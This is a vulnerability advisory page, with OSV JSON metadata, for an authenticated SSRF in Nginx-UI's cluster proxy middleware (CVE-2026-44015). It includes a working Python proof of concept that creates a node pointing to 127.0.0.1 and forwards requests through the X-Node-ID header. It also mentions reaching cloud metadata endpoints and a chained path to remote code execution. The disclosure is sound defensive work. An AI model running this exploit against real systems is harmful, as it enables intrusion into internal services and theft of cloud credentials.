GHSA-WR32-99HH-6F35

Vulnerability from github – Published: 2026-04-29 20:54 – Updated: 2026-05-13 16:31
VLAI
Summary
Nginx-UI has Server-Side Request Forgery (SSRF) via Cluster Proxy Middleware that Allows Access to Internal Services
Details

Summary

An authenticated user can perform Server-Side Request Forgery (SSRF) by creating a cluster node pointing to an arbitrary internal URL and then sending API requests with the X-Node-ID header. The Proxy middleware forwards these requests to the attacker-specified internal address, bypassing network segmentation and enabling access to services bound to localhost or internal networks.

Details

The nginx-ui Proxy middleware (internal/middleware/proxy.go) intercepts API requests containing an X-Node-ID header and forwards them to the URL of the corresponding cluster node. An attacker can:

  1. Read the node_secret from GET /api/settings (accessible to any authenticated user)
  2. Create a cluster node via POST /api/nodes pointing to any internal URL:
{
    "name": "ssrf_node",
    "url": "http://127.0.0.1:51820",
    "token": "<node_secret>",
    "enabled": true
}
  1. Send any API request with the X-Node-ID header set to the created node's ID:
GET /api/settings HTTP/1.1
Authorization: <token>
X-Node-ID: 1
  1. The Proxy middleware forwards this request to http://127.0.0.1:51820/api/settings, making a server-side request to the internal address.

Vulnerable code path: - internal/middleware/proxy.goProxy(): no validation of the node URL; allows 127.0.0.1, localhost, internal IPs, cloud metadata endpoints, etc.

The node URL is not restricted to external addresses or validated against an allowlist. Combined with the njs Code Injection vulnerability (separate advisory), this SSRF is used to trigger the njs payload executing on an internal-only nginx port, completing the RCE chain.

PoC

import requests

BASE = "http://TARGET:9000"
TOKEN = "<authenticated_jwt_token>"
HDR = {"Authorization": TOKEN}

# Step 1: Get node_secret
settings = requests.get(f"{BASE}/api/settings", headers=HDR).json()
node_secret = settings["node"]["secret"]

# Step 2: Create SSRF node pointing to internal service
resp = requests.post(f"{BASE}/api/nodes", headers=HDR, json={
    "name": "ssrf",
    "url": "http://127.0.0.1:51820",  # internal-only port
    "token": node_secret,
    "enabled": True,
})
node_id = resp.json()["id"]

# Step 3: SSRF — request is forwarded to http://127.0.0.1:51820/api/settings
resp = requests.get(
    f"{BASE}/api/settings",
    headers={**HDR, "X-Node-ID": str(node_id)},
)
print(resp.status_code, resp.text[:200])
# Response comes from the INTERNAL service, not nginx-ui

This can also target cloud metadata endpoints (e.g., http://169.254.169.254/latest/meta-data/) or any other internal service.

Impact

An authenticated attacker can:

  • Access internal services bound to localhost or private networks that are not intended to be externally reachable
  • Access cloud metadata endpoints (AWS/GCP/Azure instance metadata) to steal IAM credentials
  • Port-scan internal networks by creating nodes pointing to different internal IPs/ports
  • Trigger internal-only njs endpoints to escalate privileges (as demonstrated in the companion RCE advisory)
  • Bypass network segmentation and firewalls that only restrict inbound traffic
Severity
8.5 (High)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/0xJacky/Nginx-UI"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "2.3.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-44015"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-29T20:54:54Z",
    "nvd_published_at": "2026-05-12T22:16:35Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n\nAn authenticated user can perform Server-Side Request Forgery (SSRF) by creating a cluster node pointing to an arbitrary internal URL and then sending API requests with the `X-Node-ID` header. The Proxy middleware forwards these requests to the attacker-specified internal address, bypassing network segmentation and enabling access to services bound to localhost or internal networks.\n\n### Details\n\nThe nginx-ui Proxy middleware (`internal/middleware/proxy.go`) intercepts API requests containing an `X-Node-ID` header and forwards them to the URL of the corresponding cluster node. An attacker can:\n\n1. Read the `node_secret` from `GET /api/settings` (accessible to any authenticated user)\n2. Create a cluster node via `POST /api/nodes` pointing to any internal URL:\n```json\n{\n    \"name\": \"ssrf_node\",\n    \"url\": \"http://127.0.0.1:51820\",\n    \"token\": \"\u003cnode_secret\u003e\",\n    \"enabled\": true\n}\n```\n3. Send any API request with the `X-Node-ID` header set to the created node\u0027s ID:\n```\nGET /api/settings HTTP/1.1\nAuthorization: \u003ctoken\u003e\nX-Node-ID: 1\n```\n4. The Proxy middleware forwards this request to `http://127.0.0.1:51820/api/settings`, making a server-side request to the internal address.\n\n**Vulnerable code path:**\n- `internal/middleware/proxy.go` \u2014 `Proxy()`: no validation of the node URL; allows `127.0.0.1`, `localhost`, internal IPs, cloud metadata endpoints, etc.\n\nThe node URL is not restricted to external addresses or validated against an allowlist. Combined with the njs Code Injection vulnerability (separate advisory), this SSRF is used to trigger the njs payload executing on an internal-only nginx port, completing the RCE chain.\n\n### PoC\n\n```python\nimport requests\n\nBASE = \"http://TARGET:9000\"\nTOKEN = \"\u003cauthenticated_jwt_token\u003e\"\nHDR = {\"Authorization\": TOKEN}\n\n# Step 1: Get node_secret\nsettings = requests.get(f\"{BASE}/api/settings\", headers=HDR).json()\nnode_secret = settings[\"node\"][\"secret\"]\n\n# Step 2: Create SSRF node pointing to internal service\nresp = requests.post(f\"{BASE}/api/nodes\", headers=HDR, json={\n    \"name\": \"ssrf\",\n    \"url\": \"http://127.0.0.1:51820\",  # internal-only port\n    \"token\": node_secret,\n    \"enabled\": True,\n})\nnode_id = resp.json()[\"id\"]\n\n# Step 3: SSRF \u2014 request is forwarded to http://127.0.0.1:51820/api/settings\nresp = requests.get(\n    f\"{BASE}/api/settings\",\n    headers={**HDR, \"X-Node-ID\": str(node_id)},\n)\nprint(resp.status_code, resp.text[:200])\n# Response comes from the INTERNAL service, not nginx-ui\n```\n\nThis can also target cloud metadata endpoints (e.g., `http://169.254.169.254/latest/meta-data/`) or any other internal service.\n\n### Impact\n\nAn authenticated attacker can:\n\n- **Access internal services** bound to localhost or private networks that are not intended to be externally reachable\n- **Access cloud metadata endpoints** (AWS/GCP/Azure instance metadata) to steal IAM credentials\n- **Port-scan internal networks** by creating nodes pointing to different internal IPs/ports\n- **Trigger internal-only njs endpoints** to escalate privileges (as demonstrated in the companion RCE advisory)\n- **Bypass network segmentation** and firewalls that only restrict inbound traffic",
  "id": "GHSA-wr32-99hh-6f35",
  "modified": "2026-05-13T16:31:42Z",
  "published": "2026-04-29T20:54:54Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-wr32-99hh-6f35"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44015"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/0xJacky/nginx-ui"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Nginx-UI has Server-Side Request Forgery (SSRF) via Cluster Proxy Middleware that Allows Access to Internal Services"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.





Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Detection rules are retrieved from Rulezet.